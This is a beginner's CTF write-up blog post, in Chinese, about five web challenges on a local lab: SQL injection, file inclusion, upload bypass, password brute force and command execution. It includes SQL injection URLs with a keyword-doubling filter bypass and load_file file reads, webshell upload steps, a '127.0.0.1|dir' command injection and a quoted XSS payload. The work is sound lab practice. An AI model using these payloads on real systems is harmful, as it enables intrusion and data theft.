CTF的sql注入、文件包含、文件上传突破等五道题

最新推荐文章于 2025-03-08 20:03:05 发布
最新推荐文章于 2025-03-08 20:03:05 发布
阅读量3.4k 收藏 8
点赞数 1
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/hclimg/article/details/85316679
版权
本文详细介绍了在Windows 7系统中搭建CTF环境的过程,并通过实战演练,包括SQL注入、文件包含、文件上传突破、验证码爆破及命令执行等常见攻击手法,提供了丰富的攻防技巧与案例。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

使用win7建立一个ctf的环境,在本地测试实验

新手练习,在网上找了很多的资料

 

1、sql注入

    http://192.168.232.128/test/0x1oa/vulnerabilities/fu1.php?id=1%%27)--+

http://192.168.232.128/test/0x1oa/vulnerabilities/fu1.php?id=1%%27)order%20by%204--+

http://192.168.232.128/test/0x1oa/vulnerabilities/fu1.php?id=a%%27)%20ununionion%20all%20select%201,2,3,@@datadir--+

http://192.168.232.128/test/0x1oa/vulnerabilities/fu1.php?id=a%%27)%20ununionion%20all%20select%201,2,3,load_file(%27c:\\flag.txt%27)--+

 

 

2、文件包含

 

 

查看页面源代码

对密文进行解密分析

抓包转发测试

更改菜刀config.ini文件

用菜刀去连接 区分大小写

 

 

 

3、文件上传突破

 

上传assert.php

抓包更改Content-Type的值为:image/png

上传成功

点击查看,触发assert.php

用菜刀连接

 

 

4、验证码爆破

对目标网站进行burp抓包

转发到indruder进行密码爆破

对爆破进行分析,错误的请求的length都为1984,爆破到一个请求的length值为1989,

使用这个123qwe去更改源数据包的password值

 

成功登陆拿到key

 

 

5、命令执行

使用127.0.0.1|dir 查看当前目录下的文件

查看ipconfig

查看key.php文件内容

对登陆进行抓包

更改127.0.0.1的值

查看原文件key.php

 

 

新手练习,如有错误,请各位大佬多多指教!!!!

[网络安全自学篇] 八十一.WHUCTF之WEB类解思路WP(文件上传漏洞、冰蝎蚁剑、反序列化phar)
杨秀璋的专栏
05-30 1万+
这是作者网络安全自学教程系列,主要是关于安全工具和实践操作的在线笔记,特分享出来与博友们学习,希望您喜欢,一起进步。前文分享了WHUCTF部分题目,包括代码审计、文件包含、过滤绕过、SQL注入。这篇文章将讲解Easy_unserialize解思路,详细分享文件上传漏洞、冰蝎蚁剑用法、反序列化phar等。第一次参加CTF,还是学到了很多东西,后面几天忙于其他事情,就没再参加。人生路上,要珍惜好每一天与家人陪伴的日子。感谢武汉大学,感谢网安学院,感谢这些大佬和师傅们(尤其出和解的老师们)~
ctf-web
weixin_43150428的博客
11-04 2951
ctf-web 信息搜集 认证绕过 SQL注入 文件上传 文件包含 PHP代码审计 信息搜集 源码泄露 页面源代码 敏感文件泄漏 备份文件(.swp/.bak/.beifen/~/phps等) [外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-MGonEuLW-1604453612546)(https://i.loli.net/2020/11/02/kUboAxLhtRvD85z.png)] 数据库(mdb) 压缩包(zip/tar.gz//DS_Stor
原创:APT之网站SQL注入导致的文件任意上传
08-24
原创:APT之网站SQL注入导致的文件任意上传
基础题目文件上传突破
king丶
07-31 1549
基础题目文件上传突破 此处过滤,文件类型php,文件头, php后缀有 php php3 php5 php7 pht phtml
CISP-PTE认证考试靶场练习
最新发布
wangluoanquan111的博客
03-08 1257
下载好后直接用vmware打开,有两个靶机,一个是基础,还有个综合。基础是pte-centos6,综合是pte-2003打开后然后用vim设置静态IP地址,虚拟机用net模式的话,就设置与你虚拟机同一个网段设置好后reboot重启一下即可,然后访问81-85端口,共5。因为靶场出了问,只能打开第一,建议按照原网络环境去设置仅主机模式,原IP地址是172.16.12.100,虚拟机中的攻击机也可以配置同网段仅主机模式即可,问不大。
SQL注入——文件上传
heyingcheng的博客
03-11 2761
3,into outfile命令使用的环境:必须知道一个,服务器上可以写入文件的文件夹的完整路径。2,数据库的file权限规定了数据库用户是否有权限,向操作系统内写入和读取已存在的权限。在这里也可以用whoami看到小皮的权限,我给的是普通用户的权限,不是管理员权限。其实我们最终的目的是往目标靶场上上传一句话木马,或者是自己想上传的php文件。当然在试的过程中可能会出现一些碰巧的情况,比如用”试得到的是一样的结果。两种结果不一样,“错的就是错的“,所以我们找到了正确的闭合方式。
CTF文件上传文件包含总结
None安全团队
12-15 4883
文件上传】 一、前端检查 前端对文件后缀进行检查,该种通过抓包修改数据包即可解决 二、文件名检查 (1)大小写绕过 在windows下,可以将后缀写为pHp (2)unicode 当目标存在json_decode且检查在json_decode之前,可以将php写为\u0070hp (3)php3457 该项为apache专属 关键点在/etc/apache2/mods-available/php5.6.conf这个文件,满足.+\.ph(p[3457]?|t|tml)$,都会被当.
文件上传突破学习笔记(待更新)
热门推荐
Y4tacker的博客
06-19 1万+
文章目录漏洞总结 漏洞总结 MIME的格式: type/subtype,有时候可以通过修改Content-type来绕过
【某CMS漏洞】SQL注入漏洞分析
HBohan的博客
04-27 1810
前言 这个CMS非常适合入门代码审计的人去学习,因为代码简单且漏洞成因经典,对一些新手有学习价值, 前台注入 从入口开始:/semcms/Templete/default/Include/index.php [外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-xhTdHBVn-1651041211358)(https://p3-juejin.byteimg.com/tos-cn-i-k3u1fbpfcp/490ca1b2038f48148c14ac62455278ef~tplv-k
文件上传漏洞:upload-labs靶场通关
qq_68163788的博客
02-16 4721
upload-labs是一个专注于Web安全的在线靶场,旨在帮助安全研究人员和学习者提升对Web安全的理解和技能。该靶场提供了丰富的漏洞场景和挑战,涵盖了常见的Web安全漏洞类型,包括但不限于SQL注入、XSS跨站脚本攻击、CSRF跨站请求伪造、文件上传漏洞等。 通过upload-labs,用户可以在真实的环境中进行漏洞挖掘和漏洞利用的实践,学习并掌握各种常见的Web安全攻防技术。靶场提供了丰富的学习资源和提示,帮助用户理解漏洞的原理和挖掘漏洞的方法,同时还提供了实时的漏洞利用演示,帮助用户更好地理解漏洞
ctfshow】web篇-SQL注入 wp
孤桜懶契
08-21 4702
前言 记录web的题目wp,慢慢变强,铸剑。 SQL注入 web171 根据语句可以看到有flag没有被显示出来,让我们拼接语句来绕过 //拼接sql语句查找指定ID用户 $sql = "select username,password from user where username !='flag' and id = '".$_GET['id']."' limit 1;"; GET传参会自己解码,注释可以用%23(#), --空格,–+等,或者拼接语句不用注释也行 判断有3个字段
SQl注入文件上传sqli-labs第七关less-7
wanggonghanfei的博客
10-06 1682
参数secure_file_priv 为 NULL 时,表示限制mysqld不允许导入或导出。secure_file_priv 为 /tmp 时,表示限制mysqld只能在/tmp目录中执行导入导出,其他目录不能导出导入。secure_file_priv 没有值时,表示不限制mysqld在任意目录的导入导出。可以使用下面语句查看该值:secure_file_priv的值可以修改,在MySQL安装路径下的my.ini文件中因为此次测试需要读写权限,我将其值修改为我的网站根目录。然后查询。
ctfhub技能树-WEB(SQL注入文件上传)
Cobra的博客
09-21 1177
ctfhub技能树---WEB篇 SQL注入 整数型注入 1、判断注入类型 1 and 1=1 正常输出 1 and 1=2 不输出 (数字型注入) 2、猜解字段数 1 order by 2 页面回显正常 1 order by 3 页面无回显 字段数为2 3、查看显示位 -1 union select 1,2 显示位是Data 4、查看数据库名 -1 union select 1...
记一次文件上传引发的 SQL 注入
Restart的博客
01-06 854
本文作者:Jerry Shah (Jerry) 翻译作者:myh0st 在一次测试过程中,发现一个文件上传的入口,如图: 测试时,使用 burp 提交数据包时,将文件名处添加 XSS 的 Payload:("><img src=x onerror=alert(document.domain>.png) 然后,发现 xss 漏洞触发执行,算是一个 self-xss,危害有限: 关闭弹窗后,发现一些错误信息: 感觉文件是文件名在插入数据库时报的错,所以尝试将 xss 的 payloa.
CTF实战练习:文件上传漏洞+文件包含漏洞
烟雨天青色
08-06 1万+
BugkuCTF:文件包含2 CTF实战练习:http://120.78.xx.xxx:8013 这道题目看起来又像是跟前一道是差不多的样子,继续先查看index.php里面的内容: 哎~这次好像显示的并不是base64编码的内容,但是感觉起来这个信息一点用都没有,第二步,查看网页源代码: 从网页源代码里我们可以看出在JS脚本里包含了一个html页面,我们现在来访问一下这个页...
记录一道sql注入+ssrf+文件上传
Huamang的博客
02-13 417
拿到题目,学长给了hint,代码泄露,可以直接拿御剑扫,也可以在网站后面写/www.zip拿到源代码 看了题目后第一层有两个可能,一个是爆破进去,还有一个是sql注入,看源代码里有sql语句的拼接,而且爆破可能性太低,所以选择sql注入 sql注入 代码审计 function escape1($string){ $a = 1; $b = 2; global $link; $string = $link->real_escape_string($string);
蓝盾实训营day3——文件上传SQL注入进阶
mingC0758的博客
07-11 1125
cookie欺骗 原理:把登陆后的cookie保存下来,在其他地方访问页面时携带这个cookie.. https可能做不了这个实验 HTTP Cookie 设置了secure , 该cookie只能在HTTPS通道下被写入浏览器。 HTTPS Cookie 设置了secure , 该cookie只能在HTTPS通道下被写入浏览器。 HTTP Cookie ...
重走SQL注入文件上传
Pvr1sC的博客
01-30 536
主要是在DVWA上做做 SQL eg low php mysqli_query 如果是执行查询之类的语句( select ),那么会返回一个资源标识符,也就是我们要查找的数据结果集;如果是执行增删改之类的语句,返回的就是true或者false了。 mysqli_fetch_assoc() 函数从结果集中取得一行作为关联数组。该函数返回 的字段名是区分大小写的。 mysql_num_rows() 函数返回结果集中行的数目。 mysql_result() 函数返回结果集中一个字段的值。 REQUEST作为全局
DVWA文件包含,上传,sql注入靶场
iczfy585的博客
08-07 295
文件包含 什么是文件包含? 在php中文件包含主要是指调用了include(); include_once(); require(); require_once()函数。这些函数能够将包含的文本当做php代码去执行,而不管该文本是不是以php为扩展名的。文件包含可以分为本地文件包含()和远程文件包含。区别在于远程文件包含需要将php.ini文件中的 allow_url_fopen设置为On(默认...
西湖论剑ctf web
01-19
这些包括但不限于文件上传漏洞、文件包含漏洞、命令执行漏洞、SQL注入漏洞以及SSRF(服务端请求伪造)漏洞等[^2]。 #### 二、具体实例分析 针对此次比赛中遇到的具体Web挑战,参赛者分享了一份详细的WriteUp文档,...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值